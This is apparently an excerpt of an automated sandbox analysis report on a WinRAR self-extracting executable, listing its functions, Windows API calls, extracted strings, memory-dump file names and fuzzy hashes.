GlobalUnlock.KERNEL32(00000000), ref: 003D8CB2
GlobalFree.KERNEL32(00000000), ref: 003D8CB9

Strings

PNG, xrefs: 003D8BD2

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 1cef85c394a86f0afccef3f68e4c95709a5873233d93328e95f9a065b09e77d4
Instruction ID: a4e677f732a5462d8620acf18a8eb17752f674577dfdcaf9b67d82c9d903822b
Opcode Fuzzy Hash: 1cef85c394a86f0afccef3f68e4c95709a5873233d93328e95f9a065b09e77d4
Instruction Fuzzy Hash: F3214F76512606AFC7239F25ED49A7BBBACEF45791B01052AF84587361DB21EC00CAA1

Function 003CA273 Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2A8
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2DE
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2E6
FindNextFileW.KERNEL32(?,?,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA30E
GetLastError.KERNEL32(?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA31A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: a86c24ca906d383af477bd9ead58b9d28bf6ba9dc34ef8939a986dabafb41c4f
Instruction ID: e9d1c0bb10d4f2c53117d376afb5e654e18c24f71d80172d902f3281a97a72dd
Opcode Fuzzy Hash: a86c24ca906d383af477bd9ead58b9d28bf6ba9dc34ef8939a986dabafb41c4f
Instruction Fuzzy Hash: 14418176608685AFC326DF68C881FDAF7E8BB49344F000A2EF5D9D3240D734AD548B92

Function 003E4A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4A7B
TerminateProcess.KERNEL32(00000000,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4A82
ExitProcess.KERNEL32 ref: 003E4A94

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ee7026bc774944c3272c50f5fb9b8eb2c0ebc1125cdfde0095b70086ebb08054
Instruction ID: 692fd229fadbb3ae7c9939e2032310cefe30c78b8c7c9191f1d535f0997ba6af
Opcode Fuzzy Hash: ee7026bc774944c3272c50f5fb9b8eb2c0ebc1125cdfde0095b70086ebb08054
Instruction Fuzzy Hash: D1E04631440198AFCF13AF29CD09A983B2DEB08351F010124F8099A172CF35DC82CB84

Function 003C8409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C840E
_memcmp.LIBVCRUNTIME ref: 003C8870

Part of subcall function 003C80F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,003C86E9,?,-00000930,?), ref: 003C81BB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CharH_prologUpper_memcmp
String ID:
API String ID: 4047935103-0
Opcode ID: 87d24a45af44b575fc1c151af02bb484f0c0cba0b8947159a47297823269d4f9
Instruction ID: b406483f5c69cdadbe9bc24d1820e62e63c54aa6cb7c59d611eb2187658bdae3
Opcode Fuzzy Hash: 87d24a45af44b575fc1c151af02bb484f0c0cba0b8947159a47297823269d4f9
Instruction Fuzzy Hash: 4D72A171504185AEDF27DF648885FEABBA8AF05304F0941BEE949DF182DB319F89C760

Function 003D5984 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0ec07e458ed549b5ccd59e69f13597042c9cfcc40d7992caa6249df795247564
Instruction ID: 4f0c340be90dd4230cf2b9b302c992a26139ab174e9383a10a1f2908966d6bd1
Opcode Fuzzy Hash: 0ec07e458ed549b5ccd59e69f13597042c9cfcc40d7992caa6249df795247564
Instruction Fuzzy Hash: 1BD136B2A047458FCB16CF28E884B5ABBE1BF94304F09056FE8449B742D734ED59CB96

Function 003D9B4F Relevance: 104.0, APIs: 46, Strings: 13, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003D9B54

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 003D9EE8
winrarsfxmappingfile.tmp, xrefs: 003D9F23
*a@, xrefs: 003D9ED1
!@, xrefs: 003D9F46
@, xrefs: 003D9F0E
*A@, xrefs: 003DA2BA
"%s"%s, xrefs: 003DA08A
LICENSEDLG, xrefs: 003DA3D4
*xA, xrefs: 003D9FB2
STARTDLG, xrefs: 003D9B73
__tmp_rar_sfx_access_check_%u, xrefs: 003D9E2E
<, xrefs: 003D9F01
C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, xrefs: 003DA158, 003DA2DF

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: !@$"%s"%s$*A@$*a@$*xA$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-27168330
Opcode ID: ca196f082a0651d654df4c5ff094a071dd924f24eaa3e1fd77cb28ed16fe1f4e
Instruction ID: b9ebc245d33586d1c6eea117ca0c2dac8bfa6d5dc06218cf0e55d84ef3bd78e5
Opcode Fuzzy Hash: ca196f082a0651d654df4c5ff094a071dd924f24eaa3e1fd77cb28ed16fe1f4e
Instruction Fuzzy Hash: 404219B2940345BEEB239F60AE49FFA3B6DAB05700F01406BF645BA2D1C7B44D54CB66

Function 003CF353 Relevance: 77.3, APIs: 22, Strings: 22, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 003CF36B
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003CF383
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003CF3A6
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003CF651
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003CF669
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003CF67B
ReadFile.KERNEL32(00000000,?,00007FFE,003F0858,00000000), ref: 003CF69A
CloseHandle.KERNEL32(00000000), ref: 003CF6F2
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003CF708
CompareStringW.KERNEL32(00000400,00001001,003F08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003CF762
GetFileAttributesW.KERNELBASE(?,?,003F0870,00000800,?,00000000,?,00000800), ref: 003CF78B
GetFileAttributesW.KERNEL32(?,?,0?,00000800), ref: 003CF7C4

Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346

_swprintf.LIBCMT ref: 003CF834
_swprintf.LIBCMT ref: 003CF880

Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E

AllocConsole.KERNEL32 ref: 003CF888
GetCurrentProcessId.KERNEL32 ref: 003CF892
AttachConsole.KERNEL32(00000000), ref: 003CF899
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003CF8BF
WriteConsoleW.KERNEL32(00000000), ref: 003CF8C6
Sleep.KERNEL32(00002710), ref: 003CF8D1
FreeConsole.KERNEL32 ref: 003CF8D7
ExitProcess.KERNEL32 ref: 003CF8DF

Strings

?, xrefs: 003CF60E
dwmapi.dll, xrefs: 003CF40E, 003CF7F7
D?, xrefs: 003CF486
uxtheme.dll, xrefs: 003CF801
SetDllDirectoryW, xrefs: 003CF37D
0?, xrefs: 003CF7AB
?, xrefs: 003CF41E
?, xrefs: 003CF466
SetDefaultDllDirectories, xrefs: 003CF3A0
$?, xrefs: 003CF5C1
,?, xrefs: 003CF47E
`?, xrefs: 003CF48E
t?, xrefs: 003CF43E
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 003CF86E
@?, xrefs: 003CF5CC
D?, xrefs: 003CF42E
\?, xrefs: 003CF436
x?, xrefs: 003CF496
kernel32, xrefs: 003CF361
\?, xrefs: 003CF5D7
x?, xrefs: 003CF5E2
DXGIDebug.dll, xrefs: 003CF3E3, 003CF74E

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: ?$$?$,?$0?$@?$D?$D?$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\?$\?$`?$dwmapi.dll$kernel32$t?$uxtheme.dll$x?$x?$?$?
API String ID: 1201351596-901325715
Opcode ID: 6b0ae6d2546e47c80a5e6aa8fcca98668f07f9cc0cbd769c87dfc222f8c2b011
Instruction ID: 6a4fa94e7186281ade34ef34e0d581d73f7cdf0af9d6c548dcedd894a0139fb9
Opcode Fuzzy Hash: 6b0ae6d2546e47c80a5e6aa8fcca98668f07f9cc0cbd769c87dfc222f8c2b011
Instruction Fuzzy Hash: FFD163B50083899ED7279F68CC49FAFB7E8AF84344F50491DF288DA152DBB09908CB56

Function 003DAA45 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 438
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003DAA4A

Part of subcall function 003D96EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 003D97B4

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,003DA35D,?,00000000), ref: 003DAB7F
GetFileAttributesW.KERNEL32(?), ref: 003DAC39
DeleteFileW.KERNEL32(?), ref: 003DAC47
SetWindowTextW.USER32(?,?), ref: 003DAD90
_wcsrchr.LIBVCRUNTIME ref: 003DAF1A
GetDlgItem.USER32(?,00000066), ref: 003DAF55
SetWindowTextW.USER32(00000000,?), ref: 003DAF65
SendMessageW.USER32(00000000,00000143,00000000,0040412A), ref: 003DAF79
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003DAFA2

Strings

*A@, xrefs: 003DAF37
%s.%d.tmp, xrefs: 003DAC5F
ProgramFilesDir, xrefs: 003DAE64
Software\Microsoft\Windows\CurrentVersion, xrefs: 003DAE39
<br>, xrefs: 003DACF3

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$*A@$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-2078895908
Opcode ID: 0014bfe417ba8c0b64ded6401f3bb2dbd864a6dd3d14c186aa95a76bad5bd470
Instruction ID: 0aecebb17d97c2d1f0637e1add143ccc2c2c3b33310d68026b06a352f93a0427
Opcode Fuzzy Hash: 0014bfe417ba8c0b64ded6401f3bb2dbd864a6dd3d14c186aa95a76bad5bd470
Instruction Fuzzy Hash: F1E18173900569AAEF26EBA0EE45EEE737CAB04350F1140A7F545E7181EB709F84CB61

Function 003CCED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003CC88E: _wcschr.LIBVCRUNTIME ref: 003CC8BD

GetWindowRect.USER32(?,?), ref: 003CCF0E
GetClientRect.USER32(?,?), ref: 003CCF1A
GetWindowLongW.USER32(?,000000F0), ref: 003CCFBB
GetWindowRect.USER32(?,?), ref: 003CCFE8
GetWindowTextW.USER32(?,?,00000400), ref: 003CD007
SetWindowTextW.USER32(?,?), ref: 003CD02E
GetSystemMetrics.USER32(00000008), ref: 003CD036
GetWindow.USER32(?,00000005), ref: 003CD041
GetWindowTextW.USER32(00000000,?,00000400), ref: 003CD06C
SetWindowTextW.USER32(00000000,00000000), ref: 003CD099
GetWindowRect.USER32(00000000,?), ref: 003CD0AC
GetWindow.USER32(00000000,00000002), ref: 003CD11E

Strings

d, xrefs: 003CCF3A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Window$RectText$ClientLongMetricsSystem_wcschr
String ID: d
API String ID: 4134264131-2564639436
Opcode ID: 7b132f907259b07ce8fadcf12e39b71328864a89ad479d7613a48b4283b33e17
Instruction ID: 8ab5fb7b8626f28a7d42f8faab666b9c146976bf311416300e27cf05bf6d9f35
Opcode Fuzzy Hash: 7b132f907259b07ce8fadcf12e39b71328864a89ad479d7613a48b4283b33e17
Instruction Fuzzy Hash: 38616EB2108304AFD312DF68CD89E6BBBEAFB89714F05452DF689D2290C674ED05CB52

Function 003DB70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,00418958), ref: 003DB71D
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,003D9325), ref: 003DB748
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003DB757
SendMessageW.USER32(00000000,000000C2,00000000,003F02E4), ref: 003DB761
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003DB777
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003DB78D
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003DB7CD
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003DB7D7
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003DB7E6
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003DB809
SendMessageW.USER32(00000000,000000C2,00000000,003F1368), ref: 003DB814

Strings

\, xrefs: 003DB77D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: 56cf62e97ee65f932afbb940a47b95e0c13f54410a17b863df76ea73906a3b7e
Instruction ID: 57c7d465c86de5cb6b74547c4d13ea62b95cbf20e8c202695f207fcd4de2e89f
Opcode Fuzzy Hash: 56cf62e97ee65f932afbb940a47b95e0c13f54410a17b863df76ea73906a3b7e
Instruction Fuzzy Hash: 3C2126712857447BE312EB249C45FABBE9CEF82714F010519FA90A61D1D7A54A08CAAB

Function 003DB9AA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 003DBAD8
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 003DBB1D
GetExitCodeProcess.KERNEL32(?,?), ref: 003DBB55
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DBB7B
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 003DBC0A

Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28

Strings

.inf, xrefs: 003DBA94
*Q@, xrefs: 003DBA78
.exe, xrefs: 003DBB85
, xrefs: 003DBA2A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $*Q@$.exe$.inf
API String ID: 3686203788-207396646
Opcode ID: 3d35fd54f9fa7df4a90f882997741e195842b3eab03902bd60b52768a78deb09
Instruction ID: 97483cafa15fb80990eaf6751675dc539174213e191136c7c04bba9ae6c133dd
Opcode Fuzzy Hash: 3d35fd54f9fa7df4a90f882997741e195842b3eab03902bd60b52768a78deb09
Instruction Fuzzy Hash: 6B51C172519380DAD7339F60E940ABBFBE9AF84704F06081FE4C197395DBB19948CB52

Function 003CCACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003CCAD1
_wcschr.LIBVCRUNTIME ref: 003CCAEF
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,003CCAB3,?), ref: 003CCB0A

Part of subcall function 003D06E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003CB25B,00000000,?,?,?,?), ref: 003D0705

Strings

a, xrefs: 003CCC2B
R, xrefs: 003CCC21
*messages***, xrefs: 003CCBD6
*messages***, xrefs: 003CCC0F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
String ID: *messages***$*messages***$R$a
API String ID: 803915177-2900423073
Opcode ID: a6f2731ad17edc92e4ca2275a7404370a66d6e4bb318cd0e7ba1a5c83e367a5f
Instruction ID: 661b7302e22d1173c82b4db6eb26dfba8ab60ed6ad50d9523afca661b656d501
Opcode Fuzzy Hash: a6f2731ad17edc92e4ca2275a7404370a66d6e4bb318cd0e7ba1a5c83e367a5f
Instruction Fuzzy Hash: 409137B29002049ADB36DF68CC49FEEBBA4EF54700F11456EE64EEB2D1DA709D81CB50

Function 003E73AE Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
